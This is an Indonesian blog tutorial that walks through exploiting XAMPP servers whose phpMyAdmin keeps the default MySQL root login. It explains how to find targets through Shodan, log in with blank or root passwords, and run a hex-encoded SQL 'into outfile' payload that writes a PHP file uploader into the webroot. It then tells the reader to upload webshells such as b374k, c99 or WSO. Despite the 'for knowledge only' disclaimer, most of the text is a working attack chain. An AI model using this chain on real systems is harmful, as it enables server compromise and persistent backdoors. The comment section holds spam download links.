Eksploitasi phpMyAdmin Default MySQL Root Password pada XAMPP

7:24 AM

Didalam paket instalasi XAMPP, tersedia bebagai kebutuhan untuk membangun webserver dengan mudah dan portable, diantaranya paket instalasi Apache, PHP, Perl, MySQL, dan tidak ketinggalan untuk me-management database MySQL dengan web interface, XAMPP menyertakan phpMyAdmin sebagai database managemennya, dengan username dan password  MySQL yang secara default dapat diakses dengan bebas oleh siapa pun, dan yang lebih buruk lagi, seringkali pengguna lupa untuk mengubah sandi atau usernamenya.

Untuk mencegah kelalaian yang berakibat fatal tersebut, maka haruslah dibiasakan untuk selalu melakukan pemeriksaan atau mengganti password default pada setiap instalasi aplikasi web untuk menghindari aksi hacking.

Untu mengetahui seberapa jauh bahaya password root MySQL yang dibiarkan default, dalam artikel ini kita akan membahas bagaimana cara untuk meng-eksploitasi vulnerability tersebut melalui phpMyAdmin. Untuk melakukan itu semua, yang kita butuh adalah web browser (saya menggunakan Firefox), dan plugin hackbar untuk encode HEX (opsional).

Pertama kali, kita tentukan target yang akan dieksploitasi, bisa didapatkan melalui search engine Shodan atau Google, namun cara tersebut dapat berdampak merugikan pada server yang kita uji coba, dan ada baiknya kita memberitahukan kepada pemiliknya apabila ada celah vulnerability pada server tersebut, atau bila ingin aman lebih baik menggunakan webserver yang berjalan pada localhost, caranya dengan melakukan instalasi XAMPP pada komputer kita sendiri.

Apabila semua persiapan terpenuhi, kita langsung saja membuka host atau ip target yang dimaksud, jika halaman tidak ter-redirect secara otomatis ke /xampp, kita ketikan secara manual target.com/xampp atau 127.0.0.1/xampp. Bila halaman berhasil dibuka, maka, tampilan halamannya kurang-lebih akan seperti ini.
Untuk versi yang lebih baru, halaman XAMPP ada pada /dashboard dengan tampilan sebagai berikut.





Baik XAMPP versi terbaru atau lama, jika phpMyAdmin dapat diakses bebas tanpa autentifikasi, kita tetap dapat melakukan exploitasi. Setelah memastikan bahwa target meggunakan XAMPP, selanjutnya kita lakukan pengcekan apakah halaman login phpMyAdmin dapat diakses dengan bebas, dengan mengunjungi
target.com/phpmyadmin.
Apabila halaman phpMyAdmin dapat diakses tanpa memerlukan autentfikasi, server memiliki kemungkinan untuk dapt dieksploitasi, namun apabila server membalas dengan respon kode HTTP 403 Forbiden atau memerlukan autentfikasi sandi, hal tersebut berarti pemilik server sudah berhasil meningkatkan keamanan server miliknya.


  

Jika anda tidak menemui halaman phpMyAdmin seperti gmbar diatas, melainkan halaman login seperti ini.


Maka, coba masukkan root sebagai username dan password biarkan tanpa di isi (blank). Bila tidak berhasil masukkan root sebagai username maupun password. Apabila berhasil maka target akan menampilkan halaman seperti gambar sebelumnya.

Setelah berhasil membuka halaman phpMyAdmin selanjutnya buka tab SQL yang ada pada deretan sebelah atas. Seperti yang ditunjukan gambar berikut
Pada kolom SQL Query tersebut kita dapat memasukkan payload yang akan membuat script file uploader (dalam bahasa PHP), yang akan kita gunakan untuk meng-upload webshell backdoor. 
Berikut ini adalah  kode script php file uploader yang akan kita gunakan:

<?php echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='filele' size='44'><input type='submit'></form>";@copy($_FILES['filele']['tmp_name'],$_FILES['filele']['name']);?>

 **Minimalisir penggunaan spasi atau tabulasi pada script diatas agar script dapat diencode dan didecode seperti semula

Untuk dimasukkan kedalam payload, kode script php diatas perlu di-encode ke dalam bentuk HEX terlebih dahulu. Kita dapat menggukan plugin hackbar untuk melakuakan encode HEX tersebut.

Contoh, kita akan melakukan encode kode php "<?php phpinfo(); ?>" menggunakan hackbar yang ditunjukkan oleh gambar sebagai berikut.


Maka, kode php yang telah diconvert dalam bentuk HEX akan menjad:
3c3f70687020706870696e666f28293b203f3e




Sehingga untuk kode php file uploader diatas apabila diencode dalam bentuk HEX, akan menjadi:
3c3f706870206563686f20223c666f726d206d6574686f643d27504f53542720656e63747970653d276d756c7469706172742f666f726d2d64617461273e3c696e70757420747970653d2766696c6527206e616d653d2766696c656c65272073697a653d273434273e3c696e70757420747970653d277375626d6974273e3c2f666f726d3e223b40636f707928245f46494c45535b2766696c656c65275d5b27746d705f6e616d65275d2c245f46494c45535b2766696c656c65275d5b276e616d65275d293b3f3e

Payload yang akan dieksekusi pada SQL Query adalah sebagi berikut:
select 0x<script yang sudah diencode dlm bentuk HEX> into outfile '<path root webserver>'

Sebelum meng-eksekusi payload, kita perlu mengetahui webroot path (path letak webroot directory berada).Pada sistem operasi Windows, XAMPP secara default mempunyai webroot pada: C:\xampp\htdocs\ yang dituliskan pada payload menjadi C:/xampp/htdocs/ dan pada linux berbeda beda seperti /var/www/html/, /opt/lampp/ dan lainnya. Untuk mengetahui secara tepat, kita dapat melihat path webroot dengan bantuan fungsi phpinfo(); yang sudah ada pada paket XAMPP.


Buka /xampp/phpinfo.php, kemudian cari dengan kata kunci "DOCUMENT_ROOT" maka akan terlihat path webroot-nya.

*Path webroot dapat diketahui melalui pesan error pada web
** Tidak semua path dapat ditulis (writeable).

Setelah kita mengetahui path webroot, maka selanjutanya kita dapat meng-eksekusi payload, hasil payload akhir yang kita masukkan pada SQL Query adalah:


select 0x3c3f706870206563686f20223c666f726d206d6574686f643d27504f53542720656e63747970653d276d756c7469706172742f666f726d2d64617461273e3c696e70757420747970653d2766696c6527206e616d653d2766696c656c65272073697a653d273434273e3c696e70757420747970653d277375626d6974273e3c2f666f726d3e223b40636f707928245f46494c45535b2766696c656c65275d5b27746d705f6e616d65275d2c245f46494c45535b2766696c656c65275d5b276e616d65275d293b3f3e into outfile 'C:/xampp/htdocs/xampp/uploader.php'
Penjelasan:
1. Warna hijau (C:/xampp/htdocs/), merupakan path webroot
2. Warna ungu (/xampp/), merupakan path setelahnya atau directory dimana file akan dibuat
3. Warna biru menjelaskan nama file dan ekstensinya


Setelah semua sudah siap tinggal kita taruh payload diatas pada kolom SQL Query dan kita eksekusi dengan mengeklik tombol Go.

Apabila proses eksekusi berjalan dengan benar tanpa pesan error, seperti gambar diatas. Berarti file uploader berhasil dibuat pada path yang sudah ditentukan tadi.
Selanjutnya kita periksa apakah file uploader berhasil dibuat, dengan membuka url host beserta directory tempat kita menaruh file uploader tadi. (/xampp/uploader.php)

Dan seperti yang terlihat, kita berhasil mebuat file uploader pada server target, selanjutnya kita bisa meng-upload webshell utama seperti b374k, c99, WSO dan banyak lagi.
Untuk webshell b374k, anda bisa mendapatkannya langsung di https://github.com/b374k/b374k


Demikian artikel yang dapat saya berikan, mohon maaf apabila terjadi kesalahan ataupun ada pihak yang merasa dirugikan, artikel ini hanya bertujuan untuk Ilmu Pengetahuan saja, kirimkan Komentar apabila ada yang ingin ditanyakan,  Semoga bermanfaat.

You Might Also Like

1 comments

  1. Eksploitasi Phpmyadmin Default Mysql Root Password Pada Xampp - Fdev Id >>>>> Download Now

    >>>>> Download Full

    Eksploitasi Phpmyadmin Default Mysql Root Password Pada Xampp - Fdev Id >>>>> Download LINK

    >>>>> Download Now

    Eksploitasi Phpmyadmin Default Mysql Root Password Pada Xampp - Fdev Id >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete

Artikel menarik lainnya